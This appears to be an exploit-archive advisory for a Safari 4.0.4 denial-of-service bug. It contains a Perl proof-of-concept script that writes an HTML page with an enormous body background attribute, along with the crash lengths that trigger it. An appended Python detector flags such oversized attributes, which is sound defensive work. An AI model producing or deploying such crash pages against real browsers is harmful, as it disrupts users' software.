Safari 4.0.4 (531.21.10) - Stack Overflow/run

2010.03.07
Credit: John Cobb
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other

#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.1]
# Tested on WinXP (32bit) SP3
#
# v1.1:
# Extra Tags which also crash:
# <img src =
# <iframe src =
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

use strict;
use warnings;

my $filename = $ARGV[0];
my $buffer   = $ARGV[1];

# Both arguments are required; stop here rather than opening an undefined file name.
if (!defined($filename) || !defined($buffer)) {
    print "Usage: $0 <filename.html> <buffer>\n\n";
    exit 1;
}

my $header = "<html> <head>" . "\n";
# The background attribute value is <buffer> "A" characters long.
my $crash  = "<body background = \"" . "A" x $buffer . "\">" . "\n";
my $footer = "</html>" . "\n";

my $data = $header . $crash . $footer;

# Write the generated page and report a failed open instead of continuing silently.
open(my $fh, '>', $filename) or die "Cannot open $filename: $!\n";
print $fh $data;
close($fh);

exit;

References:

http://nobytes.com/exploits/Safari_4.0.4_background_DoS_pl.txt
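
A defender-side check for the pattern the PoC above relies on, added here as an example and not part of the original advisory or the author's code: it flags `body background`, `img src` and `iframe src` values at or above the smallest crashing length listed in the PoC comments. The names `LongAttrFinder`, `find_oversized_attrs` and `constructed_sample` are assumptions, and the threshold is only what the author reports for the build tested.

```python
from html.parser import HTMLParser

# Tag/attribute pairs named in the PoC and its header comments.
WATCHED = {("body", "background"), ("img", "src"), ("iframe", "src")}
# Smallest attribute length the PoC comments list as crashing Safari 4.0.4.
CRASH_LEN = 114516


class LongAttrFinder(HTMLParser):
    """Collects watched attributes whose value length reaches the limit."""

    def __init__(self, limit):
        super().__init__(convert_charrefs=True)
        self.limit = limit
        self.hits = []  # (tag, attribute, value length, line number)

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names before this call.
        for name, value in attrs:
            if (tag, name) in WATCHED and value and len(value) >= self.limit:
                self.hits.append((tag, name, len(value), self.getpos()[0]))


def find_oversized_attrs(html, limit=CRASH_LEN):
    """Return a hit tuple for every watched attribute of at least `limit` chars."""
    finder = LongAttrFinder(limit)
    finder.feed(html)
    finder.close()
    return finder.hits


def constructed_sample(value_len):
    """Constructed test page with the same layout the PoC writes to disk."""
    return '<html> <head>\n<body background = "' + "A" * value_len + '">\n</html>\n'


if __name__ == "__main__":
    for n in (CRASH_LEN - 1, CRASH_LEN):
        print(n, find_oversized_attrs(constructed_sample(n)))
```

A proxy or mail gateway would normally run this with a far lower `limit`, since no legitimate URL attribute approaches this size.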

